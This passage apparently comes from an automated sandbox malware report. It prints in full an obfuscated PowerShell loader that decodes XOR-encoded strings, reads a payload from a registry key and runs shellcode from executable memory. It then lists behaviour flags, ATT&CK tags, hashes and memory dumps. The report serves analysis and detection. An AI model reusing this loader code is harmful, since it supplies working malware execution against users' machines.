Re'ApBpr9PaFCi2FhEAfFEnFNo4MiBBoDDaAGa0SkBBrDBrBUn9MiECaBUnFPrCDeEKaFSeCPr2MiEFrBAmFMyCDeBFi3SoDHy4ViFEl3IsEDrBReFBr2PrFGr6UnFKr8DiBNo5DoCSk6coDMe4JaFSe3HaEKr9BaCDiDTiEPr9ApEFeFNaCFr0piAHy7AiATh7TrCLe7AfFTa8SkEBoFStFSe2beBEn1EvBCrDInAFaDOvESm5keASpCSeAGrDDrAseDOsAAdDTrAFiDFeAChDbiBFa1SiBArDDoAWaDInEUd5KnAOnEAdAMoDLiAWaDSaALiDMoBCr1caBVaDGrATrDBiEIn5ReAja9flBSn4La'Te;UdBGriGlsDetSkaKinTedBisSkvSyrSpgOfeScnDi9Di Ac`$coTForOvaMifKoiMekbamReiRenRuiStsPatKoeQurVaiPiuSlmVrsPu8An;Ce`$GaMtoaTagBliAksSktPerRaaKatsaiClcstaSnlBtlDeyPr=Br(GeGMyePhtMi-ReITatJaeCamSkPIdrMaoEspSmeImrGytShyPl Os-KePSkaCytVehbe Un'NsHSpKshCBeUSk:Su\DoFInoChrRypStaUngFatBenLsiGagKrsSkabafStgIniOofMitAfeWorSasve\FrUColEioPreSasAftHjeba'Ai)Un.MiHAreSkptraUntGeeHyckntItoNomjoyBr;Bo`$SuTHurUlaBafdeiAgkLomAtisvnApiMesDiteneAerTaiAnuTimafsba9Sp Ex=Pr SuHSuTGrBJa Le'feBDe9DiCTo9MoEExFSoFAnCReFinBTeFOf4TiFOp6AmFGa0afFLu4BeFCo3viFEx4SoEToEAnESu9BrFFu8SeEEnFtrFGa4SlEfr8MoFIn0FoESwEUdBApDUdAWo0UdBAmDtaCBi6ViCSuERoETe4SiEAkEFrESi9UdFDh8biFBr0DeBBu3IsDMoEReFFo2WeFBe3maEUdBHeFVu8InEFuFEfETr9DeCKo0woANe7IdAOp7SiDZyBAhECrFExFCh2TjFos0ToDHeFUnFUnCAnEFaETaFSo8DuAIlBSeAdu9UnCUnEFeESy9MoEBlFSuFTr4nrFha3DrFPhADeBda5UnBUn9RaDdi0OpFStCpeFFiABeFCh4ReEGeEOpEDi9UnEKoFkoFlaCepEIn9TrFMa4SuFGiEFrFHiCDeFso1PrFUn1FoEDi4SaBAl4Rh'Fl;KaBTriNssFitByaStnBidOusPuvDerFogHeeHynNa9Br Pr`$CoTVarWaaRafTriSakAdmToiShnMaiomsMotSleNordeiTruUdmDesUd9De;Fr`$FoMSlaOvgTriGgssptFyrIlaTetDeiPhcInaMalMalMuyBe0Ve Mu=Un diHIlTThBRe St'EnCPh6UnCMaEBaEHe4StEKaEHiEGn9LrFLo8BeFMi0ApBDo3AnCGrFFlEFi8UnFSe3EaESp9ReFVe4UdFPy0TiFAa8AdBBr3LoDUn4JeFDv3CiEGo9UnFEx8RuEBrFRaFAn2duEAiDKaCPaESyFSy8BiEReFTrEReBKaFTa4RiFKlEMeFSt8paEBeESnBCo3SnDMi0SeFseCInEDaFEjEIdEKbFAt5BoFMoCElFtr1foCRe0RaASr7UdARo7FrDOsEUnFsk2MaEBvDHiEBa4FoBco5EcBOu9JoCFa9SkEOvFSnFHjCTaFReBspFRe4MlFKa6MiFEa0KrFPr4huFKa3RoFCl4ArEFuEScEDr9AfFMa8deEOoFNeFCo4KoESk8SpFTr0LaESwEAfBSm1BvBKaDPrAGeDAbBGe1PaBKrDObBcoDcaBRe9TaCOnAInFMa4PhFpa1UlFRe9FaFFr1CoEPh4VaAGuEFoBAf1NoBLoDTaATiEMrAFoBSeABe4BeBBe4Hj'Er;KnBvaiPesNgtFeaImnDidLysEkvHyrBogOueKonBy9Un fr`$PuMBraPrgOsiArsOvtGurElaSttShiFncmaaMilBolHaySy0bi;Sa`$mesBeiMazFoeIn=Ga`$abTtirMoaBifcuiNekUnmVkiVinSqiOpsgetKoeHyrniiHouCnmNosLa.StcDioDruTjnFatId-rm3Di6St9Af;Br`$AlMReasygBoiBusTotArrPrabetgriKncAlaPylSplDkyKa1Ou Sa=Se anHvaTHuBan Ha'KnCLa6SeCNoEShEOp4CoEFiEWeEDr9EnFDi8BrFOv0ClBBe3SuCUnFFiEPh8PrFIn3ObEEk9ReFNo4EtFAr0UnFAn8DiBSt3FoDHj4FoFDr3fjEPa9RiFEl8AdEDeFVoFPr2VmEBeDBeCTeEBiFMo8FrEReFSaEIsBSnFLa4OvFAnEFaFOv8MiEAnEUdBTm3UnDJe0KrFMeCStEUnFUtEBuEUdFTr5GaFApCPaFti1HoCFr0UrAIn7EsATe7BrDAfEAuFIn2kaELeDUnEWo4AfBLa5ReBDi9SeCBe9ChEBeFArFAmCMiFCaBHaFIn4CoFKl6VoFRa0MiFSk4UtFFr3DiFDe4GrESpEclEBi9SyFNe8inENeFnoFPo4UnEli8GrFSt0PiEMuECoBSt1DiBTaDelAUkEAmAMeBReASk4MiBAu1StBCoDPaBSe9faFSu2ToEWiFCeFPu4FlBTr1TeBAfDCaBGr9CiENeEObFBj4geEAf7PoFKo8KaBcl4Gr'Fr;caBUniCisTutTaaRenCudReskovDyrSogFeelynAn9De Pe`$BeMSiaRegPriDosTitLsrNeaCatBniFocBeaMilPslhyyka1Ho;Bi`$GeMReaTagCeiSpsNotRdrBfaRytPriRecinaDilShlEryBr2Di Ro=Be TuHTiTOcBAc Re'FoBsw9feEAuBRaFUnCPrEHoFFoCPo2PrEInFCaEar8UnFJa3MiFFr0ToFBi8BrBPrDOrATh0KoBImDLoCAn6DyCTwESvEsw4RaEGrEBrESk9MaFNe8FuFDi0SoBSl3frCEiFMaEpl8UdFAm3ArEGa9joFSt4kaFFo0WhFBr8PuBBr3DiDGe4DrFDe3CaEOp9soFSd8BrELoFTiFSk2OrEStDBeCFrEChFOv8CoESeFJeESiBLyFAc4laFToEElFUn8UnEOrEStBBr3TiDLo0HoFFrCgeEFoFmaEReESvFpi5TjFBaCliFKo1RoCMo0teATu7HyAEi7DaDdoAMeFHi8ViEBu9CiDTo9TnFOs8NoFAf1eaFEm8OuFEqACiFMoCLeEtr9TpFHe8ViDHuBDyFUn2FuELaFfoDUnBMaEco8PrFTr3NoFapEOpESu9UdFYe4SuFma2AfFPo3DrCFlDDoFFo2PrFSe4juFGa3CoECo9InFSo8GaEToFAaBAf5doBAg9apCVaARoFmo4ChFSm1EoFPo9GaFEs1LiEYt4IaAEkESuBCo1KaBPoDCeBBr5SuDGrAHoDMa9LuCMa9TaBUmDRhDBlDVeBSt5SaCPa6ShDNa4RiFAk3hyETj9FuCchDOfEKa9CuETeFAmCPi0CoBTr1OrCfr6SaDun4RoFSu3viEPo9SlCShDOvEPa9UnEMaFFlCin0BaBku4hiBMiDFuBPr5JuCbr6alCToBWhFBe2UnFTr4UkFNe9LaCAb0meBBo4AuBMa4diBAu4Fy'Vi;StBGtiSisFitDeaScnLsdSksTrvAcrBegKleSvnCh9do Ta`$EqMhyaOvgSkiTusRetHurFiaHytReiIscWaaTrlColPrySi2Sm;Un`$GuMKoaOfgUniApsCotTarReaTrtOuiRecStaBelvilFlySp3He Kr=do EqHHyTThBSt Ko'FeBPh9PaEStBTrFBiCPlEPrFFiCFi2TaEBaFKnECa8riFHo3SoFwr0SeFho8UnBFa3aqDPr4TrFKr3AnEflBFoFCo2CoFLe6TaFUd8ReBTh5RaBwa9GgFOr2ArEPrFAnFTo4udBEl1FoBTu9NiEReBXaFUfCUnETaFUnCNi2HyFSu3DeEPr9psBGy4Bl'by;TeBUniMdsLotOdaDinVedspsTevPerspgRaeCanCo9ab Ma`$ReMDiaBigBriOpsFotForElaomtMeiMicEkabelBrlpryMa3Sy#Po;""";;Function Magistratically9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Samvirk = $Samvirk + $HS.Substring($i, 1); } $Samvirk;}$Straffesparkfelter0 = Magistratically9 'CoIScERaXHo ';$Straffesparkfelter2 = Magistratically9 'LessctKoaDrrGatGa-SujFloLabPr ';$Straffesparkfelter1= Magistratically9 $Kaktusplanter;;if([IntPtr]::size -eq 8){ & ($Straffesparkfelter2) { param($a) powershell $a } -RunAs32 -Argument $Straffesparkfelter1 | wait-job | Receive-Job;}else{ & ($Straffesparkfelter0) $Straffesparkfelter1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1784

\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 157); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Normalisfbr0=HTB 'CEE4EEE9F8F0B3F9F1F1';$Normalisfbr1=HTB 'D0F4FEEFF2EEF2FBE9B3CAF4F3AEAFB3C8F3EEFCFBF8D3FCE9F4EBF8D0F8E9F5F2F9EE';$Normalisfbr2=HTB 'DAF8E9CDEFF2FEDCF9F9EFF8EEEE';$Normalisfbr3=HTB 'CEE4EEE9F8F0B3CFE8F3E9F4F0F8B3D4F3E9F8EFF2EDCEF8EFEBF4FEF8EEB3D5FCF3F9F1F8CFF8FB';$Normalisfbr4=HTB 'EEE9EFF4F3FA';$Normalisfbr5=HTB 'DAF8E9D0F2F9E8F1F8D5FCF3F9F1F8';$Normalisfbr6=HTB 'CFC9CEEDF8FEF4FCF1D3FCF0F8B1BDD5F4F9F8DFE4CEF4FAB1BDCDE8FFF1F4FE';$Normalisfbr7=HTB 'CFE8F3E9F4F0F8B1BDD0FCF3FCFAF8F9';$Normalisfbr8=HTB 'CFF8FBF1F8FEE9F8F9D9F8F1F8FAFCE9F8';$Normalisfbr9=HTB 'D4F3D0F8F0F2EFE4D0F2F9E8F1F8';$Bistandsvrgen0=HTB 'D0E4D9F8F1F8FAFCE9F8C9E4EDF8';$Bistandsvrgen1=HTB 'DEF1FCEEEEB1BDCDE8FFF1F4FEB1BDCEF8FCF1F8F9B1BDDCF3EEF4DEF1FCEEEEB1BDDCE8E9F2DEF1FCEEEE';$Bistandsvrgen2=HTB 'D4F3EBF2F6F8';$Bistandsvrgen3=HTB 'CDE8FFF1F4FEB1BDD5F4F9F8DFE4CEF4FAB1BDD3F8EACEF1F2E9B1BDCBF4EFE9E8FCF1';$Bistandsvrgen4=HTB 'CBF4EFE9E8FCF1DCF1F1F2FE';$Bistandsvrgen5=HTB 'F3E9F9F1F1';$Bistandsvrgen6=HTB 'D3E9CDEFF2E9F8FEE9CBF4EFE9E8FCF1D0F8F0F2EFE4';$Bistandsvrgen7=HTB 'D4D8C5';$Bistandsvrgen8=HTB 'C1';Set-Alias -name Bistandsvrgen9 -value $Bistandsvrgen7;function fkp {Param ($v_m, $v_p) ;$Trafikministeriums0 =HTB 'B9EBE8F3F0BDA0BDB5C6DCEDEDD9F2F0FCF4F3C0A7A7DEE8EFEFF8F3E9D9F2F0FCF4F3B3DAF8E9DCEEEEF8F0FFF1F4F8EEB5B4BDE1BDCAF5F8EFF8B0D2FFF7F8FEE9BDE6BDB9C2B3DAF1F2FFFCF1DCEEEEF8F0FFF1E4DEFCFEF5F8BDB0DCF3F9BDB9C2B3D1F2FEFCE9F4F2F3B3CEEDF1F4E9B5B9DFF4EEE9FCF3F9EEEBEFFAF8F3A5B4C6B0ACC0B3D8ECE8FCF1EEB5B9D3F2EFF0FCF1F4EEFBFFEFADB4BDE0B4B3DAF8E9C9E4EDF8B5B9D3F2EFF0FCF1F4EEFBFFEFACB4';Bistandsvrgen9 $Trafikministeriums0;$Trafikministeriums5 = HTB 'B9EBFCEFC2FAEDFCBDA0BDB9EBE8F3F0B3DAF8E9D0F8E9F5F2F9B5B9D3F2EFF0FCF1F4EEFBFFEFAFB1BDC6C9E4EDF8C6C0C0BDDDB5B9D3F2EFF0FCF1F4EEFBFFEFAEB1BDB9D3F2EFF0FCF1F4EEFBFFEFA9B4B4';Bistandsvrgen9 $Trafikministeriums5;$Trafikministeriums1 = HTB 'EFF8E9E8EFF3BDB9EBFCEFC2FAEDFCB3D4F3EBF2F6F8B5B9F3E8F1F1B1BDDDB5C6CEE4EEE9F8F0B3CFE8F3E9F4F0F8B3D4F3E9F8EFF2EDCEF8EFEBF4FEF8EEB3D5FCF3F9F1F8CFF8FBC0B5D3F8EAB0D2FFF7F8FEE9BDCEE4EEE9F8F0B3CFE8F3E9F4F0F8B3D4F3E9F8EFF2EDCEF8EFEBF4FEF8EEB3D5FCF3F9F1F8CFF8FBB5B5D3F8EAB0D2FFF7F8FEE9BDD4F3E9CDE9EFB4B1BDB5B9EBE8F3F0B3DAF8E9D0F8E9F5F2F9B5B9D3F2EFF0FCF1F4EEFBFFEFA8B4B4B3D4F3EBF2F6F8B5B9F3E8F1F1B1BDDDB5B9EBC2F0B4B4B4B4B1BDB9EBC2EDB4B4';Bistandsvrgen9 $Trafikministeriums1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Trafikministeriums2 = HTB 'B9CBC9DFBDA0BDC6DCEDEDD9F2F0FCF4F3C0A7A7DEE8EFEFF8F3E9D9F2F0FCF4F3B3D9F8FBF4F3F8D9E4F3FCF0F4FEDCEEEEF8F0FFF1E4B5B5D3F8EAB0D2FFF7F8FEE9BDCEE4EEE9F8F0B3CFF8FBF1F8FEE9F4F2F3B3DCEEEEF8F0FFF1E4D3FCF0F8B5B9D3F2EFF0FCF1F4EEFBFFEFA5B4B4B1BDC6CEE4EEE9F8F0B3CFF8FBF1F8FEE9F4F2F3B3D8F0F4E9B3DCEEEEF8F0FFF1E4DFE8F4F1F9F8EFDCFEFEF8EEEEC0A7A7CFE8F3B4B3D9F8FBF4F3F8D9E4F3FCF0F4FED0F2F9E8F1F8B5B9D3F2EFF0FCF1F4EEFBFFEFA4B1BDB9FBFCF1EEF8B4B3D9F8FBF4F3F8C9E4EDF8B5B9DFF4EEE9FCF3F9EEEBEFFAF8F3ADB1BDB9DFF4EEE9FCF3F9EEEBEFFAF8F3ACB1BDC6CEE4EEE9F8F0B3D0E8F1E9F4FEFCEEE9D9F8F1F8FAFCE9F8C0B4';Bistandsvrgen9 $Trafikministeriums2;$Trafikministeriums3 = HTB 'B9CBC9DFB3D9F8FBF4F3F8DEF2F3EEE9EFE8FEE9F2EFB5B9D3F2EFF0FCF1F4EEFBFFEFABB1BDC6CEE4EEE9F8F0B3CFF8FBF1F8FEE9F4F2F3B3DEFCF1F1F4F3FADEF2F3EBF8F3E9F4F2F3EEC0A7A7CEE9FCF3F9FCEFF9B1BDB9EBFCEFC2EDFCEFFCF0F8E9F8EFEEB4B3CEF8E9D4F0EDF1F8F0F8F3E9FCE9F4F2F3DBF1FCFAEEB5B9D3F2EFF0FCF1F4EEFBFFEFAAB4';Bistandsvrgen9 $Trafikministeriums3;$Trafikministeriums4 = HTB 'B9CBC9DFB3D9F8FBF4F3F8D0F8E9F5F2F9B5B9DFF4EEE9FCF3F9EEEBEFFAF8F3AFB1BDB9DFF4EEE9FCF3F9EEEBEFFAF8F3AEB1BDB9EBEFE9B1BDB9EBFCEFC2EDFCEFFCF0F8E9F8EFEEB4B3CEF8E9D4F0EDF1F8F0F8F3E9FCE9F4F2F3DBF1FCFAEEB5B9D3F2EFF0FCF1F4EEFBFFEFAAB4';Bistandsvrgen9 $Trafikministeriums4;$Trafikministeriums5 = HTB 'EFF8E9E8EFF3BDB9CBC9DFB3DEEFF8FCE9F8C9E4EDF8B5B4';Bistandsvrgen9 $Trafikministeriums5 ;}$kk = HTB 'F6F8EFF3F8F1AEAF';$Trafikministeriums6 = HTB 'B9EBFCEFC2EBFCBDA0BDC6CEE4EEE9F8F0B3CFE8F3E9F4F0F8B3D4F3E9F8EFF2EDCEF8EFEBF4FEF8EEB3D0FCEFEEF5FCF1C0A7A7DAF8E9D9F8F1F8FAFCE9F8DBF2EFDBE8F3FEE9F4F2F3CDF2F4F3E9F8EFB5B5FBF6EDBDB9F6F6BDB9DFF4EEE9FCF3F9EEEBEFFAF8F3A9B4B1BDB5DAD9C9BDDDB5C6D4F3E9CDE9EFC0B1BDC6C8D4F3E9AEAFC0B1BDC6C8D4F3E9AEAFC0B1BDC6C8D4F3E9AEAFC0B4BDB5C6D4F3E9CDE9EFC0B4B4B4';Bistandsvrgen9 $Trafikministeriums6;$var_nt = fkp $Bistandsvrgen5 $Bistandsvrgen6;$Trafikministeriums7 = HTB 'B9CAF4F1F9F1E4AEBDA0BDB9EBFCEFC2EBFCB3D4F3EBF2F6F8B5C6D4F3E9CDE9EFC0A7A7C7F8EFF2B1BDAEABA4B1BDADE5AEADADADB1BDADE5A9ADB4';Bistandsvrgen9 $Trafikministeriums7;$Trafikministeriums8 = HTB 'B9F2EFF4BDA0BDB9EBFCEFC2EBFCB3D4F3EBF2F6F8B5C6D4F3E9CDE9EFC0A7A7C7F8EFF2B1BDADE5ACADADADADADB1BDADE5AEADADADB1BDADE5A9B4';Bistandsvrgen9 $Trafikministeriums8;$Magistratically=(Get-ItemProperty -Path 'HKCU:\Forpagtnigsafgifters\Uloeste').Hepatectomy;$Trafikministeriums9 = HTB 'B9C9EFFCFBF4F6F0F4F3F4EEE9F8EFF4E8F0EEBDA0BDC6CEE4EEE9F8F0B3DEF2F3EBF8EFE9C0A7A7DBEFF2F0DFFCEEF8ABA9CEE9EFF4F3FAB5B9D0FCFAF4EEE9EFFCE9F4FEFCF1F1E4B4';Bistandsvrgen9 $Trafikministeriums9;$Magistratically0 = HTB 'C6CEE4EEE9F8F0B3CFE8F3E9F4F0F8B3D4F3E9F8EFF2EDCEF8EFEBF4FEF8EEB3D0FCEFEEF5FCF1C0A7A7DEF2EDE4B5B9C9EFFCFBF4F6F0F4F3F4EEE9F8EFF4E8F0EEB1BDADB1BDBDB9CAF4F1F9F1E4AEB1BDAEABA4B4';Bistandsvrgen9 $Magistratically0;$size=$Trafikministeriums.count-369;$Magistratically1 = HTB 'C6CEE4EEE9F8F0B3CFE8F3E9F4F0F8B3D4F3E9F8EFF2EDCEF8EFEBF4FEF8EEB3D0FCEFEEF5FCF1C0A7A7DEF2EDE4B5B9C9EFFCFBF4F6F0F4F3F4EEE9F8EFF4E8F0EEB1BDAEABA4B1BDB9F2EFF4B1BDB9EEF4E7F8B4';Bistandsvrgen9 $Magistratically1;$Magistratically2 = HTB 'B9EBFCEFC2EFE8F3F0F8BDA0BDC6CEE4EEE9F8F0B3CFE8F3E9F4F0F8B3D4F3E9F8EFF2EDCEF8EFEBF4FEF8EEB3D0FCEFEEF5FCF1C0A7A7DAF8E9D9F8F1F8FAFCE9F8DBF2EFDBE8F3FEE9F4F2F3CDF2F4F3E9F8EFB5B9CAF4F1F9F1E4AEB1BDB5DAD9C9BDDDB5C6D4F3E9CDE9EFC0B1C6D4F3E9CDE9EFC0B4BDB5C6CBF2F4F9C0B4B4B4';Bistandsvrgen9 $Magistratically2;$Magistratically3 = HTB 'B9EBFCEFC2EFE8F3F0F8B3D4F3EBF2F6F8B5B9F2EFF4B1B9EBFCEFC2F3E9B4';Bistandsvrgen9 $Magistratically3#"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:668

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
3556c68bb6e326e0fe5a1272fee3380c

SHA1
c695b4a544fdf6c180ae4b14ea2e54ddb6ca6ff9

SHA256
e7aa4928a6e116cd4fe43b17412fe0982c8c9e18b6ea9abcd1f1eb3f372046e3

SHA512
8ba208c6b8e751ded51a00c5b60b0dc69bc26ad2f6c1d527f0eb3a0e2918b568e87d967ae2269733e777b4d89f482fda7ec4ca09abfabc552ee16f62f4e47eae

Download Submit
memory/556-60-0x0000000000000000-mapping.dmp

Download
memory/556-71-0x0000000073BE0000-0x000000007418B000-memory.dmp

Filesize
5.7MB

Download
memory/556-63-0x0000000073BE0000-0x000000007418B000-memory.dmp

Filesize
5.7MB

Download
memory/556-61-0x0000000075B11000-0x0000000075B13000-memory.dmp

Filesize
8KB

Download
memory/668-68-0x0000000073BE0000-0x000000007418B000-memory.dmp

Filesize
5.7MB

Download
memory/668-64-0x0000000000000000-mapping.dmp

Download
memory/668-69-0x0000000005130000-0x0000000005230000-memory.dmp

Filesize
1024KB

Download
memory/668-72-0x0000000073BE0000-0x000000007418B000-memory.dmp

Filesize
5.7MB

Download
memory/668-73-0x0000000005130000-0x0000000005230000-memory.dmp

Filesize
1024KB

Download
memory/1684-54-0x000007FEFC421000-0x000007FEFC423000-memory.dmp

Filesize
8KB

Download
memory/1784-59-0x00000000026F4000-0x00000000026F7000-memory.dmp

Filesize
12KB

Download
memory/1784-62-0x00000000026FB000-0x000000000271A000-memory.dmp

Filesize
124KB

Download
memory/1784-58-0x000007FEF34F0000-0x000007FEF404D000-memory.dmp

Filesize
11.4MB

Download
memory/1784-57-0x000007FEF4050000-0x000007FEF4A73000-memory.dmp

Filesize
10.1MB

Download
memory/1784-67-0x00000000026F4000-0x00000000026F7000-memory.dmp

Filesize
12KB

Download
memory/1784-70-0x00000000026FB000-0x000000000271A000-memory.dmp

Filesize
124KB

Download
memory/1784-55-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing